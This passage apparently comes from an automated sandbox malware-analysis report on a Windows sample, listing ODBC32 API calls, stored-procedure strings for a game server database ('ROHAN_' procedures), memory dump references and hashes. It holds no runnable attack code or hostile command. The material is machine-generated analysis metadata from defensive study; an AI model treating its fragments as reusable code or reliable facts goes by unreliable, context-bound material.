                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043CBC6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043CBFE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043CC36
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FD,0000002A,00000000,?,00000000,?,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043CC79
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FE,000000FD,0000002A), ref: 0043CCB1
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043CCE9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043CD21
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043CD59
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043CD91
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043CDC9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043CDFE
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_InsTItemHonor]( ?,?,?,?,?,?,?,?,?,? )}, xrefs: 0043CB7E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_InsTItemHonor]( ?,?,?,?,?,?,?,?,?,? )}
                                                                                      • API String ID: 0-1086152483
                                                                                      • Opcode ID: ec062a0752bc03d8b077670da8af4dac0a34af87416200983e0ec9c5e0dbf0d0
                                                                                      • Instruction ID: 12c263fc2c61fb5b6bc67f23abd63ba7e92b18c54521fcea19fdcbea2dc1eea9
                                                                                      • Opcode Fuzzy Hash: ec062a0752bc03d8b077670da8af4dac0a34af87416200983e0ec9c5e0dbf0d0
                                                                                      • Instruction Fuzzy Hash: 13812DB4A40254BBEB218B44CC52FEA7334FB88B19F20C2C9F6586E2C5D5F16DC48B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_InsEventItem](?,?,?,?,?,?,?,?,?) } ,000000FD), ref: 004276DB
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042771A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00427752
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FD,0000002A,00000000,?,00000000,?,?,00000000,00000001,000000F0,00000004,00000000), ref: 00427792
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FE,000000FD,0000002A), ref: 004277CA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00427802
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042783A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00427872
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004278AA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004278E2
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00427917
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_InsEventItem](?,?,?,?,?,?,?,?,?) } , xrefs: 004276D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_InsEventItem](?,?,?,?,?,?,?,?,?) }
                                                                                      • API String ID: 0-1431875944
                                                                                      • Opcode ID: a88fd19a75b600e50ddc5246b1cde9a9003cb67fabba1e89959c34f912bdf885
                                                                                      • Instruction ID: 7658457c2a2025ccb7b0bfb8e7edf97f6f7dee29a9473339dde45735d8201805
                                                                                      • Opcode Fuzzy Hash: a88fd19a75b600e50ddc5246b1cde9a9003cb67fabba1e89959c34f912bdf885
                                                                                      • Instruction Fuzzy Hash: 58713170A482157BEB64DF44CC5AFA97334EB84B18F208388F6197E2D1D9B36D80CB18
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_CreateCharacter](?,?,?,?,?,?,?,?,?)} ,000000FD), ref: 0042B7A4
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042B7E3
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042B81B
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000014,00000000,?,00000015,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042B853
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,00000001,0000000C,00000014), ref: 0042B88B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042B8C3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042B8FB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042B933
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042B968
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042B9A0
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042B9D8
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_CreateCharacter](?,?,?,?,?,?,?,?,?)} , xrefs: 0042B79B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_CreateCharacter](?,?,?,?,?,?,?,?,?)}
                                                                                      • API String ID: 0-4012541833
                                                                                      • Opcode ID: ead385d381391cc0cff89c452f8e4d341b275be03d020544bb49514a466b6b46
                                                                                      • Instruction ID: 4012d820fce7db5c6df9cf78300d277883f033234bb53f1edc9dbbc4efca5749
                                                                                      • Opcode Fuzzy Hash: ead385d381391cc0cff89c452f8e4d341b275be03d020544bb49514a466b6b46
                                                                                      • Instruction Fuzzy Hash: DC71E370EC02177BEB299F54CD52FBA7379EB84B18F104298F7247E2C5D5B16A808B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SetNGuildWarRank] (?,?,?,?,?,?,?,?,?)},000000FD), ref: 00433BF6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00433C35
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00433C6A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00433CA2
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000011,00000000,?,00000012,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00433CDA
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000014,00000000,?,00000015,00000000,?,00000000,00000001,00000001,0000000C,00000011), ref: 00433D12
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,00000001,0000000C,00000014), ref: 00433D4A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00433D82
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00433DBA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00433DF2
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00433E2A
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SetNGuildWarRank] (?,?,?,?,?,?,?,?,?)}, xrefs: 00433BED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SetNGuildWarRank] (?,?,?,?,?,?,?,?,?)}
                                                                                      • API String ID: 0-2694757850
                                                                                      • Opcode ID: cc9d274b36d2ed9b9eb4ec51fa480e31fc24c076ee4e7232cc2b94cc44beb16d
                                                                                      • Instruction ID: c87d39b6a76c426e514243e62c4c4c71ce16c0c781cc37438da5315511592c07
                                                                                      • Opcode Fuzzy Hash: cc9d274b36d2ed9b9eb4ec51fa480e31fc24c076ee4e7232cc2b94cc44beb16d
                                                                                      • Instruction Fuzzy Hash: 747131B07903147BEB249B44CC62FAA7334EB85B18F108288F7197E6C5D6B56E80CF19
                                                                                      APIs
                                                                                        • Part of subcall function 0045E040: wvsprintfA.USER32(?,?,?), ref: 0045E068
                                                                                        • Part of subcall function 0045E040: lstrlenA.KERNEL32(?,?,00000000), ref: 0045E082
                                                                                        • Part of subcall function 0045E040: WriteFile.KERNEL32(?,?,00000000), ref: 0045E094
                                                                                      • GetCurrentThread.KERNEL32 ref: 0045E808
                                                                                      • GetCurrentProcess.KERNEL32(00000000,?,?), ref: 0045E80F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$FileProcessThreadWritelstrlenwvsprintf
                                                                                      • String ID: %08x %08x $%s %d %s$%s %s$%s +%x$Call Stack Information:$Params: %08x %08x %08x %08x
                                                                                      • API String ID: 2641415868-410147386
                                                                                      • Opcode ID: 9aa02cd3b680df1f45263b2465486038ece93fdbbbd352537db9ddecc4a1d3c7
                                                                                      • Instruction ID: 951f4ce8a07d6e45ea0ae35dbceaf91a04d024a3e1090407af03c4829448f4e3
                                                                                      • Opcode Fuzzy Hash: 9aa02cd3b680df1f45263b2465486038ece93fdbbbd352537db9ddecc4a1d3c7
                                                                                      • Instruction Fuzzy Hash: A571ACB1A00218AFDB54DF65CC45FEB73B8AB48305F048199F90DA7282DB749B84CFA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
